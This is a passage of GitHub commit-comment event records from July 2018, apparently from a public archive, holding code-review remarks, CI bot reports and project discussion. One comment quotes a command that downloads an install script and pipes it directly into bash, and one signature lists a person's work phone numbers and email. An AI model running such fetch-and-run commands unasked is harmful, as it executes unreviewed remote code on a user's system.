{"id":"7917872426","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"warrenm/imgui"},"payload":{"comment":{"id":29593721,"position":10,"line":10,"path":"examples/imgui_impl_osx.h","commit_id":"b8fb50e486490601dce84062d3071f849d7eaff1","created_at":"2018-07-04T11:20:28Z","updated_at":"2018-07-04T11:20:28Z","author_association":"NONE","body":"Any reason you removed the IMGUI_API marker here?"}},"created_at":"2018-07-04T11:20:28Z"}
{"id":"7917882155","type":"CommitCommentEvent","actor":{"login":"maxnet"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29593768,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T11:22:40Z","updated_at":"2018-07-04T11:22:40Z","author_association":"NONE","body":"Please also map \"nl\" to \"us\"\r\n\"nl\" layout keyboard is obsolete.\r\n\r\n(only Apple still claims to sell a \"nl layout keyboard\" but it is actually US layout + euro currency key)"}},"created_at":"2018-07-04T11:22:40Z"}
{"id":"7917883056","type":"CommitCommentEvent","actor":{"login":"Keraito"},"repo":{"name":"storybooks/storybook"},"payload":{"comment":{"id":29593771,"position":6,"line":128,"path":"addons/jest/README.md","commit_id":"1e3d925a86ef7f339a7d5c426de741f2fbf96051","created_at":"2018-07-04T11:22:53Z","updated_at":"2018-07-04T11:22:53Z","author_association":"CONTRIBUTOR","body":"This should be `disabled` -> `disable` right? (Same for L132)"}},"created_at":"2018-07-04T11:22:53Z"}
{"id":"7917908637","type":"CommitCommentEvent","actor":{"login":"ModyDj"},"repo":{"name":"ModyDj/my-travel-plan"},"payload":{"comment":{"id":29593835,"position":null,"line":null,"path":null,"commit_id":"6290d38b8841c6417295e30cca13fb5f8bac6a03","created_at":"2018-07-04T11:28:36Z","updated_at":"2018-07-04T11:28:36Z","author_association":"OWNER","body":"Add transform to h2"}},"created_at":"2018-07-04T11:28:36Z"}
{"id":"7917910527","type":"CommitCommentEvent","actor":{"login":"ModyDj"},"repo":{"name":"ModyDj/my-travel-plan"},"payload":{"comment":{"id":29593840,"position":null,"line":null,"path":null,"commit_id":"118ff4a923735f3562a49a378998b2402d065ef2","created_at":"2018-07-04T11:29:01Z","updated_at":"2018-07-04T11:29:01Z","author_association":"OWNER","body":"Add destination hover codes"}},"created_at":"2018-07-04T11:29:01Z"}
{"id":"7917914981","type":"CommitCommentEvent","actor":{"login":"stearruda"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29593852,"position":null,"line":null,"path":null,"commit_id":"43add2a640214483b00d9ca491990bb86104501e","created_at":"2018-07-04T11:29:59Z","updated_at":"2018-07-04T11:29:59Z","author_association":"NONE","body":"Have you discovered the problem @AbinayaBagavan?\r\nI'm having the same problem.\r\n\r\nI see this message when I enter `http://localhost:5001/`\r\n\r\n    Welcome to the Address Book API!\r\n    \r\n    Use an Authorization header to work with your own data:\r\n\r\n    fetch(url, { headers: { 'Authorization': 'whatever-you-want' }})\r\n\r\n    The following endpoints are available:\r\n\r\n    GET /contacts\r\n    DELETE /contacts/:id\r\n    POST /contacts { name, email, avatarURL }"}},"created_at":"2018-07-04T11:29:59Z"}
{"id":"7917919735","type":"CommitCommentEvent","actor":{"login":"rugerpunk"},"repo":{"name":"IXARdev/IxarCoin"},"payload":{"comment":{"id":29593861,"position":null,"line":null,"path":null,"commit_id":"4ead0292e673cdaf6af623f4ebb8c14841b660d6","created_at":"2018-07-04T11:31:00Z","updated_at":"2018-07-04T11:31:00Z","author_association":"COLLABORATOR","body":"Cosmetic change | about.png"}},"created_at":"2018-07-04T11:31:00Z"}
{"id":"7917921429","type":"CommitCommentEvent","actor":{"login":"ManjuParam"},"repo":{"name":"ManjuParam/SampleProject"},"payload":{"comment":{"id":29593864,"position":2,"line":2,"path":"README.md","commit_id":"217714ac7d089e81a71c1d65baee2965c50a11b1","created_at":"2018-07-04T11:31:22Z","updated_at":"2018-07-04T11:31:22Z","author_association":"OWNER","body":"dfhsdfh"}},"created_at":"2018-07-04T11:31:22Z"}
{"id":"7917926476","type":"CommitCommentEvent","actor":{"login":"radu-matei"},"repo":{"name":"PoisonousJohn/gameserver-autoscaler"},"payload":{"comment":{"id":29593877,"position":38,"line":38,"path":"batch/batch.go","commit_id":"9811420e6bfc80d9246533e2e07a8c60348d343a","created_at":"2018-07-04T11:32:31Z","updated_at":"2018-07-04T11:32:31Z","author_association":"NONE","body":"You should check the error here"}},"created_at":"2018-07-04T11:32:31Z"}
{"id":"7917929638","type":"CommitCommentEvent","actor":{"login":"miralemd"},"repo":{"name":"qlik-oss/picasso.js"},"payload":{"comment":{"id":29593885,"position":null,"line":null,"path":null,"commit_id":"1b396014f1766157f1524f51896abdbc3abdc594","created_at":"2018-07-04T11:33:15Z","updated_at":"2018-07-04T11:33:15Z","author_association":"COLLABORATOR","body":"because we're not using independent versioning"}},"created_at":"2018-07-04T11:33:15Z"}
{"id":"7917931416","type":"CommitCommentEvent","actor":{"login":"taitetsu"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29593887,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-04T11:33:40Z","updated_at":"2018-07-04T11:33:40Z","author_association":"MEMBER","body":"ん？\r\n「初期値」は必要ないってこと？\r\nここで\r\n\r\nhttps://movabletype.atlassian.net/browse/MTC-25480?focusedCommentId=366733&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-366733\r\n\r\n>limit の 初期値は 10 で。\r\n\r\nと改めてコメントしたのは？"}},"created_at":"2018-07-04T11:33:40Z"}
{"id":"7917933339","type":"CommitCommentEvent","actor":{"login":"fifteenhex"},"repo":{"name":"fifteenhex/sx127x"},"payload":{"comment":{"id":29593891,"position":null,"line":null,"path":null,"commit_id":"90fcb7879e106b6e47b09d654fc663d98f402e49","created_at":"2018-07-04T11:34:09Z","updated_at":"2018-07-04T11:34:09Z","author_association":"OWNER","body":"That's a good question. I have seen other drivers that use an IRQ and also periodically check the IRQ registers of the device to make sure an interrupt wasn't missed. Would you mind opening an issue for this?"}},"created_at":"2018-07-04T11:34:09Z"}
{"id":"7917937175","type":"CommitCommentEvent","actor":{"login":"radu-matei"},"repo":{"name":"PoisonousJohn/gameserver-autoscaler"},"payload":{"comment":{"id":29593894,"position":86,"line":86,"path":"batch/batch.go","commit_id":"9811420e6bfc80d9246533e2e07a8c60348d343a","created_at":"2018-07-04T11:35:01Z","updated_at":"2018-07-04T11:35:01Z","author_association":"NONE","body":"It would be easier to follow the error check if you removed the new line between the value and error check"}},"created_at":"2018-07-04T11:35:01Z"}
{"id":"7917938763","type":"CommitCommentEvent","actor":{"login":"dash20c"},"repo":{"name":"coolhyunjin/DKU_ML_labmeeting"},"payload":{"comment":{"id":29593903,"position":null,"line":null,"path":null,"commit_id":"2781b506a3cd8d161e456817d14a0a8b31f77c03","created_at":"2018-07-04T11:35:23Z","updated_at":"2018-07-04T11:35:23Z","author_association":"COLLABORATOR","body":"asd"}},"created_at":"2018-07-04T11:35:23Z"}
{"id":"7917953915","type":"CommitCommentEvent","actor":{"login":"yegemberdin"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29593951,"position":1,"line":1,"path":"hw4naz/components/Bar.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-04T11:38:56Z","updated_at":"2018-07-04T11:38:56Z","author_association":"OWNER","body":"да я забыла, потом всмпомнила только)"}},"created_at":"2018-07-04T11:38:56Z"}
{"id":"7917953966","type":"CommitCommentEvent","actor":{"login":"ptz0n"},"repo":{"name":"marcus13371337/homebridge-verisure"},"payload":{"comment":{"id":29593952,"position":null,"line":null,"path":null,"commit_id":"81bb2c162c25d6cd84aebd8aafcb0b97e0ec154c","created_at":"2018-07-04T11:38:56Z","updated_at":"2018-07-04T11:38:56Z","author_association":"NONE","body":"This have now been added to the main repo as part of the refactor."}},"created_at":"2018-07-04T11:38:56Z"}
{"id":"7917954139","type":"CommitCommentEvent","actor":{"login":"andreypopp"},"repo":{"name":"esy/esy"},"payload":{"comment":{"id":29593954,"position":10,"line":8,"path":"esy/System.ml","commit_id":"63f8da34669eeefb5b6546f15bf121d6114b2e47","created_at":"2018-07-04T11:38:59Z","updated_at":"2018-07-04T11:38:59Z","author_association":"CONTRIBUTOR","body":"is that the correct test for cygwin? I got this from https://en.wikipedia.org/wiki/Uname"}},"created_at":"2018-07-04T11:38:59Z"}
{"id":"7917955027","type":"CommitCommentEvent","actor":{"login":"MarlBurroW"},"repo":{"name":"ludobourgoin/google"},"payload":{"comment":{"id":29593956,"position":null,"line":null,"path":null,"commit_id":"34ea192d629007ada26c76dc7fb38ea5960735dc","created_at":"2018-07-04T11:39:10Z","updated_at":"2018-07-04T11:39:10Z","author_association":"NONE","body":"Nice commit dude"}},"created_at":"2018-07-04T11:39:10Z"}
{"id":"7917956409","type":"CommitCommentEvent","actor":{"login":"andreypopp"},"repo":{"name":"esy/esy"},"payload":{"comment":{"id":29593964,"position":7,"line":5,"path":"esy/System.ml","commit_id":"63f8da34669eeefb5b6546f15bf121d6114b2e47","created_at":"2018-07-04T11:39:30Z","updated_at":"2018-07-04T11:39:30Z","author_association":"CONTRIBUTOR","body":"What other specific envs to we need to know about right now?"}},"created_at":"2018-07-04T11:39:30Z"}
{"id":"7917957699","type":"CommitCommentEvent","actor":{"login":"radu-matei"},"repo":{"name":"PoisonousJohn/gameserver-autoscaler"},"payload":{"comment":{"id":29593966,"position":1,"line":1,"path":"app-conf.go","commit_id":"f029939d044af823537b86d3f7d1ae8d570d4eb4","created_at":"2018-07-04T11:39:46Z","updated_at":"2018-07-04T11:39:46Z","author_association":"NONE","body":"The preferred naming case for `.go` files is snake case, so this would become `app_conf.go` - or maybe even `conf/config.go`.\r\n\r\nThis is not a hard convention though, it's not specified in the [How to write code](https://golang.org/doc/code.html) doc."}},"created_at":"2018-07-04T11:39:46Z"}
{"id":"7917957914","type":"CommitCommentEvent","actor":{"login":"ghollingworth"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29593967,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T11:39:49Z","updated_at":"2018-07-04T11:39:49Z","author_association":"NONE","body":"It should really be a change that is pushed upstream...  The choices\nbetween keyboard and language come from Debian I believe.\n\n\n-- \n--\nDirector of Software Engineering, Raspberry Pi (Trading) Limited\nt:  +44 (0) 1223 322633\nm: +44 (0) 7450 946289\ne: gordon@raspberrypi.org\nw: www.raspberrypi.org\n"}},"created_at":"2018-07-04T11:39:49Z"}
{"id":"7917959212","type":"CommitCommentEvent","actor":{"login":"andreypopp"},"repo":{"name":"esy/esy"},"payload":{"comment":{"id":29593973,"position":17,"line":24,"path":"esy/Task.ml","commit_id":"63f8da34669eeefb5b6546f15bf121d6114b2e47","created_at":"2018-07-04T11:40:06Z","updated_at":"2018-07-04T11:40:06Z","author_association":"CONTRIBUTOR","body":"The rule is \"use `:` on unix-y systems and `;` on everything else\", am I right?"}},"created_at":"2018-07-04T11:40:06Z"}
{"id":"7917960106","type":"CommitCommentEvent","actor":{"login":"suprachow"},"repo":{"name":"suprachow/vquery_jp"},"payload":{"comment":{"id":29593975,"position":null,"line":null,"path":null,"commit_id":"ce446b9293b444f8a59bee6770b1fbd86aa196bd","created_at":"2018-07-04T11:40:18Z","updated_at":"2018-07-04T11:40:18Z","author_association":"OWNER","body":"Job Portal"}},"created_at":"2018-07-04T11:40:18Z"}
{"id":"7917960248","type":"CommitCommentEvent","actor":{"login":"andreypopp"},"repo":{"name":"esy/esy"},"payload":{"comment":{"id":29593976,"position":15,"line":22,"path":"esy/Task.ml","commit_id":"63f8da34669eeefb5b6546f15bf121d6114b2e47","created_at":"2018-07-04T11:40:20Z","updated_at":"2018-07-04T11:40:20Z","author_association":"CONTRIBUTOR","body":"cygwin here is an exception"}},"created_at":"2018-07-04T11:40:20Z"}
{"id":"7917961786","type":"CommitCommentEvent","actor":{"login":"radu-matei"},"repo":{"name":"PoisonousJohn/gameserver-autoscaler"},"payload":{"comment":{"id":29593980,"position":1,"line":1,"path":"create-server-instance.go","commit_id":"f029939d044af823537b86d3f7d1ae8d570d4eb4","created_at":"2018-07-04T11:40:42Z","updated_at":"2018-07-04T11:40:42Z","author_association":"NONE","body":"Same comment with the file name here as well."}},"created_at":"2018-07-04T11:40:42Z"}
{"id":"7917964048","type":"CommitCommentEvent","actor":{"login":"aleksi75"},"repo":{"name":"apache/incubator-superset"},"payload":{"comment":{"id":29593981,"position":null,"line":null,"path":null,"commit_id":"226b4fb5f43b3074767b5ced947ed8c478ded638","created_at":"2018-07-04T11:41:14Z","updated_at":"2018-07-04T11:41:14Z","author_association":"CONTRIBUTOR","body":"Ok, I found the issue =)\r\nhttps://github.com/apache/incubator-superset/issues/5339"}},"created_at":"2018-07-04T11:41:14Z"}
{"id":"7917964681","type":"CommitCommentEvent","actor":{"login":"visyagin"},"repo":{"name":"visyagin/BTreeClosestLeaf"},"payload":{"comment":{"id":29593984,"position":33,"line":33,"path":"src/com/visyagin/btree/entity/BinaryTree.java","commit_id":"9293e48115d579003ac976904cd3168a56b90325","created_at":"2018-07-04T11:41:22Z","updated_at":"2018-07-04T11:41:22Z","author_association":"OWNER","body":"If we replace > with >=, we will get a path of the latest nearest node to root. It means if we have two leaves placed on the same distance to root, we will get the path to the second node. If we leave > sign, we will get the first path."}},"created_at":"2018-07-04T11:41:22Z"}
{"id":"7917974912","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29594010,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T11:43:37Z","updated_at":"2018-07-04T11:43:37Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-04T11:43:37Z"}
{"id":"7917980429","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"Hananmajali/Notification"},"payload":{"comment":{"id":29594026,"position":13,"line":11,"path":"README.md","commit_id":"5dd85dbfa3d85c14f051f0222314b90ba75cdd20","created_at":"2018-07-04T11:44:47Z","updated_at":"2018-07-04T11:44:47Z","author_association":"CONTRIBUTOR","body":"add me as a team member"}},"created_at":"2018-07-04T11:44:47Z"}
{"id":"7917981351","type":"CommitCommentEvent","actor":{"login":"Tiogaplanet"},"repo":{"name":"adamgreen/MiP_ProMini-Pack"},"payload":{"comment":{"id":29594032,"position":null,"line":null,"path":null,"commit_id":"00cccf379dc3d3f9cd9f468db7f9812cec2ee9ad","created_at":"2018-07-04T11:45:00Z","updated_at":"2018-07-04T11:45:00Z","author_association":"NONE","body":"Nice!  I'll try it out later today."}},"created_at":"2018-07-04T11:45:00Z"}
{"id":"7917981379","type":"CommitCommentEvent","actor":{"login":"carlhannes"},"repo":{"name":"qlik-oss/picasso.js"},"payload":{"comment":{"id":29594033,"position":null,"line":null,"path":null,"commit_id":"1b396014f1766157f1524f51896abdbc3abdc594","created_at":"2018-07-04T11:45:01Z","updated_at":"2018-07-04T11:45:01Z","author_association":"COLLABORATOR","body":"I thought we did before but we stopped doing that?"}},"created_at":"2018-07-04T11:45:01Z"}
{"id":"7917981548","type":"CommitCommentEvent","actor":{"login":"PierreRambaud"},"repo":{"name":"mickaelandrieu/PrestaShop"},"payload":{"comment":{"id":29594035,"position":5,"line":56,"path":"src/Core/Search/ControllerAction.php","commit_id":"3d8241db3c6077126d4337c7459a3fd8151e6d4b","created_at":"2018-07-04T11:45:03Z","updated_at":"2018-07-04T11:45:03Z","author_association":"COLLABORATOR","body":"You can remove `0, 30` too =)"}},"created_at":"2018-07-04T11:45:03Z"}
{"id":"7917981565","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29594038,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T11:45:04Z","updated_at":"2018-07-04T11:45:04Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-04T11:45:04Z"}
{"id":"7917983120","type":"CommitCommentEvent","actor":{"login":"PierreRambaud"},"repo":{"name":"mickaelandrieu/PrestaShop"},"payload":{"comment":{"id":29594041,"position":42,"line":42,"path":"src/Core/Search/SearchParametersInterface.php","commit_id":"3d8241db3c6077126d4337c7459a3fd8151e6d4b","created_at":"2018-07-04T11:45:22Z","updated_at":"2018-07-04T11:45:22Z","author_association":"COLLABORATOR","body":"No newline at the end of file."}},"created_at":"2018-07-04T11:45:22Z"}
{"id":"7917983556","type":"CommitCommentEvent","actor":{"login":"spl237"},"repo":{"name":"raspberrypi-ui/piwiz"},"payload":{"comment":{"id":29594044,"position":null,"line":null,"path":null,"commit_id":"7063e8eac1ab5060d7f402d94494f4121e040a34","created_at":"2018-07-04T11:45:28Z","updated_at":"2018-07-04T11:45:28Z","author_association":"CONTRIBUTOR","body":"The default behaviour of the wizard is to use a country's default keyboard as defined by Debian - so for the Netherlands, the \"nl\" keyboard is used. If the \"nl\" layout is indeed obsolete, then as Gordon says, this ought to be fixed in Debian, not corrected in here. The keymappings in this table are to add keyboards for countries for which there is no country default in Debian."}},"created_at":"2018-07-04T11:45:28Z"}
{"id":"7917989211","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/pi-dual"},"payload":{"comment":{"id":29594058,"position":101,"line":514,"path":"survey/survey.tex","commit_id":"25e7bff13cfd12feb6734cb7b9f6e0876b340307","created_at":"2018-07-04T11:46:40Z","updated_at":"2018-07-04T11:46:40Z","author_association":"OWNER","body":"Do we really want to give away the \"punchline\" to section 3 right away in the introduction?  It's the only part of this new material that I'm not so sure about."}},"created_at":"2018-07-04T11:46:40Z"}
{"id":"7917989650","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29594060,"position":null,"line":null,"path":null,"commit_id":"5893f2b1d6855d35c37dce017776fab69f85c1ab","created_at":"2018-07-04T11:46:46Z","updated_at":"2018-07-04T11:46:46Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/checkbrokenlinksinci. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-04T11:46:46Z"}
{"id":"7917992751","type":"CommitCommentEvent","actor":{"login":"imaxoi"},"repo":{"name":"root-project/root"},"payload":{"comment":{"id":29594066,"position":7,"line":243,"path":"tree/dataframe/src/RDFNodes.cxx","commit_id":"a793f5f4a8036a84767bf032ffd23616971a5d60","created_at":"2018-07-04T11:47:28Z","updated_at":"2018-07-04T11:47:28Z","author_association":"CONTRIBUTOR","body":"Gonna force push a fix to this."}},"created_at":"2018-07-04T11:47:28Z"}
{"id":"7917994270","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"rbkEsraaRamahi/pairing_system"},"payload":{"comment":{"id":29594071,"position":7,"line":5,"path":"README.md","commit_id":"25cce6c91d63c789ab9f3cf72db256ab46bcc36f","created_at":"2018-07-04T11:47:48Z","updated_at":"2018-07-04T11:47:48Z","author_association":"NONE","body":"It's look so good, but it needs some work"}},"created_at":"2018-07-04T11:47:48Z"}
{"id":"7917994532","type":"CommitCommentEvent","actor":{"login":"ZiroKyl"},"repo":{"name":"ZiroKyl/LLTR-Simulation-Model"},"payload":{"comment":{"id":29594073,"position":6,"line":53,"path":"inet/src/inet/applications/lltrapp/LLTRApp.cc","commit_id":"66207ce3c0522430e2f3502dae35834ba4b1d150","created_at":"2018-07-04T11:47:52Z","updated_at":"2018-07-04T11:47:52Z","author_association":"OWNER","body":"Ох уж эти авто-отступы...\r\nЗдесь должно быть 2 таба и пробелы (так же как в \"LLTRSuperApp.cc\" https://github.com/ZiroKyl/LLTR-Simulation-Model/commit/66207ce3c0522430e2f3502dae35834ba4b1d150#diff-02277476b6159cf48bcbb73a59853c17R47)."}},"created_at":"2018-07-04T11:47:52Z"}
{"id":"7917995686","type":"CommitCommentEvent","actor":{"login":"ClemsP"},"repo":{"name":"AtelierSoude/OpenRepairPlatform"},"payload":{"comment":{"id":29594076,"position":null,"line":null,"path":null,"commit_id":"0a30fe4b8cf657c36e38812efc0738faa244817a","created_at":"2018-07-04T11:48:07Z","updated_at":"2018-07-04T11:48:07Z","author_association":"COLLABORATOR","body":"faudra que tu m'explique héhé :) "}},"created_at":"2018-07-04T11:48:07Z"}
{"id":"7917998556","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29594085,"position":null,"line":null,"path":null,"commit_id":"9a912a8d8226d9a5ab80bece29f8202f0608bf86","created_at":"2018-07-04T11:48:42Z","updated_at":"2018-07-04T11:48:42Z","author_association":"OWNER","body":"Standard and elementary models adjusted to name various engine types combinations"}},"created_at":"2018-07-04T11:48:42Z"}
{"id":"7918001547","type":"CommitCommentEvent","actor":{"login":"hjjie2006"},"repo":{"name":"hjjie2006/OpsManage"},"payload":{"comment":{"id":29594095,"position":null,"line":null,"path":null,"commit_id":"c22a774eb67f909e6ed2c60bfd890f8eba8c83c5","created_at":"2018-07-04T11:49:21Z","updated_at":"2018-07-04T11:49:21Z","author_association":"OWNER","body":"REDSI_KWARGS_LPUSH   redis密码参数 password"}},"created_at":"2018-07-04T11:49:21Z"}
{"id":"7918001897","type":"CommitCommentEvent","actor":{"login":"ffdixon"},"repo":{"name":"bigbluebutton/bbb-install"},"payload":{"comment":{"id":29594096,"position":null,"line":null,"path":null,"commit_id":"1e95d7fdd250b6b0e836672cefa9dd4ec8c2f511","created_at":"2018-07-04T11:49:25Z","updated_at":"2018-07-04T11:49:25Z","author_association":"MEMBER","body":"@dduyrat Did you use this script to initially setup your BigBlueButton 2.0 server with a Let's Encrypt certificate?"}},"created_at":"2018-07-04T11:49:25Z"}
{"id":"7918006855","type":"CommitCommentEvent","actor":{"login":"MohannadBakkar"},"repo":{"name":"Sarakoki/Event-Manager"},"payload":{"comment":{"id":29594115,"position":5,"line":122,"path":"database-mongo/event-handler.js","commit_id":"e3a789eec8de108691a604bd623c2e3d49f2226c","created_at":"2018-07-04T11:50:33Z","updated_at":"2018-07-04T11:50:33Z","author_association":"NONE","body":"Would you please remove this line."}},"created_at":"2018-07-04T11:50:33Z"}
{"id":"7918010088","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"neorusse/Pixel-Art-Maker-Project"},"payload":{"comment":{"id":29594122,"position":null,"line":null,"path":null,"commit_id":"8e3fa3a555901b434f9cb9f6cfd379c6ca891265","created_at":"2018-07-04T11:51:14Z","updated_at":"2018-07-04T11:51:14Z","author_association":"NONE","body":"Adding comments to your code makes your code easily readable and even helps you understand what you're trying to achieve. It also earns you an extra credit as a developer."}},"created_at":"2018-07-04T11:51:14Z"}
{"id":"7918010817","type":"CommitCommentEvent","actor":{"login":"Ricelll"},"repo":{"name":"Ricelll/SCUT-FBP5500"},"payload":{"comment":{"id":29594123,"position":null,"line":null,"path":null,"commit_id":"d9e3b69a97bb514de2cb673b216a4f0a2252fbb2","created_at":"2018-07-04T11:51:22Z","updated_at":"2018-07-04T11:51:22Z","author_association":"OWNER","body":"Share some webs about Graph Networks.\r\nhttp://www.inference.vc/how-powerful-are-graph-convolutions-review-of-kipf-welling-2016-2/\r\nhttp://www.360doc.com/content/17/1125/17/99071_707053186.shtml\r\nhttp://tkipf.github.io/graph-convolutional-networks/"}},"created_at":"2018-07-04T11:51:22Z"}
{"id":"7918014782","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29594132,"position":null,"line":null,"path":null,"commit_id":"6d42f55456ec4af9374755b00f05b1209dd7910b","created_at":"2018-07-04T11:52:17Z","updated_at":"2018-07-04T11:52:17Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-238](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-238).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-238-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-04T11:52:17Z"}
{"id":"7918019845","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29594162,"position":null,"line":null,"path":null,"commit_id":"aea6234c57742e372384ff61bc69784483e7c9fd","created_at":"2018-07-04T11:53:25Z","updated_at":"2018-07-04T11:53:25Z","author_association":"COLLABORATOR","body":"@thomasmari \r\nAre you sure 3 trigger modules are needed?\r\nDid you read my last email ?"}},"created_at":"2018-07-04T11:53:25Z"}
{"id":"7918021130","type":"CommitCommentEvent","actor":{"login":"dduyrat"},"repo":{"name":"bigbluebutton/bbb-install"},"payload":{"comment":{"id":29594164,"position":null,"line":null,"path":null,"commit_id":"1e95d7fdd250b6b0e836672cefa9dd4ec8c2f511","created_at":"2018-07-04T11:53:43Z","updated_at":"2018-07-04T11:53:43Z","author_association":"NONE","body":"I used the script below:\r\n\r\nwget -qO- https://ubuntu.bigbluebutton.org/bbb-install.sh | bash -s -- -v xenial-200 -s bbb.example.com -e info@example.com -t\r\nand I wish that let's encrypted be renewed automatically"}},"created_at":"2018-07-04T11:53:43Z"}
{"id":"7918024000","type":"CommitCommentEvent","actor":{"login":"gaga201702"},"repo":{"name":"luyentap/django-model"},"payload":{"comment":{"id":29594175,"position":4,"line":8,"path":"practice/admin.py","commit_id":"77231edd16571c11ddf5d6bd2a630f9046834036","created_at":"2018-07-04T11:54:23Z","updated_at":"2018-07-04T11:54:23Z","author_association":"CONTRIBUTOR","body":"abc"}},"created_at":"2018-07-04T11:54:23Z"}
{"id":"7918036486","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29594211,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-04T11:57:07Z","updated_at":"2018-07-04T11:57:07Z","author_association":"CONTRIBUTOR","body":"> Das mit dem repeat <20 sieht so nach dem umgehen eines Bugs aus.\r\n> Das gefällt mir nicht.\r\n> \r\n> Vor dem PR hat es ja funktioniert, dass es zu keiner Endlosschleife kommt.\r\n\r\nIch denke wir hatten eher Glück, daß es bis jetzt noch zu keiner Endlosschleife gekommen ist.\r\nDas Problem ist, daß mit $i die for Schleifenvariable verändert wird.\r\nOder kannst Du bei dem derzeitigen Code zu 100% ausschliessen, daß es zu einer Endlosschleife kommen kann.\r\nDas ganze ist recht komplex und es ist recht schwierig alle denkbaren Fälle durchzutesten.\r\n\r\nIst es besser wenn ich folgendes ergänze: \"der Teufel ist ein Eichhörnchen\"?\r\n\r\nHier ist der derzeitige Code:\r\n\r\n```\r\n\t\t\t\t\t#Find next position of valid signal (skip invalid pieces)\r\n\t\t\t\t\tmy $regex=\".{$i}\".$start_regex;\r\n\t\t\t\t\tDebug \"$name: searching new start with ($regex)\\n\" if ($debug);\r\n\t\t\t\t\t\r\n\t\t\t\t\t$rawData =~ /$regex/;\r\n\t\t\t\t\tif (defined($-[0]) && ($-[0] > 0)) {\r\n\t\t\t\t\t\t#$i=$-[0]+ $i+ length($startStr);\r\n\t\t\t\t\t\t$i=$-[0]+ $i;\r\n\t\t\t\t\t\t$i=$i-$signal_width if ($i>0 && length($startStr) == 0); #Todo:\r\n\t\t\t\t\t\tDebug \"$name: found restart at Position $i ($regex)\\n\" if ($debug);\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\tlast;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t\t$i=$i-($signal_width-length($startStr))\tif ($i>0 && defined($startStr) && length($startStr) > 0 && length($startStr) < $signal_width);\r\n\t\t\t\t\tSIGNALduino_Log3 $name, 5, \"$name: restarting demodulation at Position $i+$signal_width\" if ($debug);\r\n```\r\n\r\nUnd hier ist mein geänderter Code.\r\nDie Endlosschleife 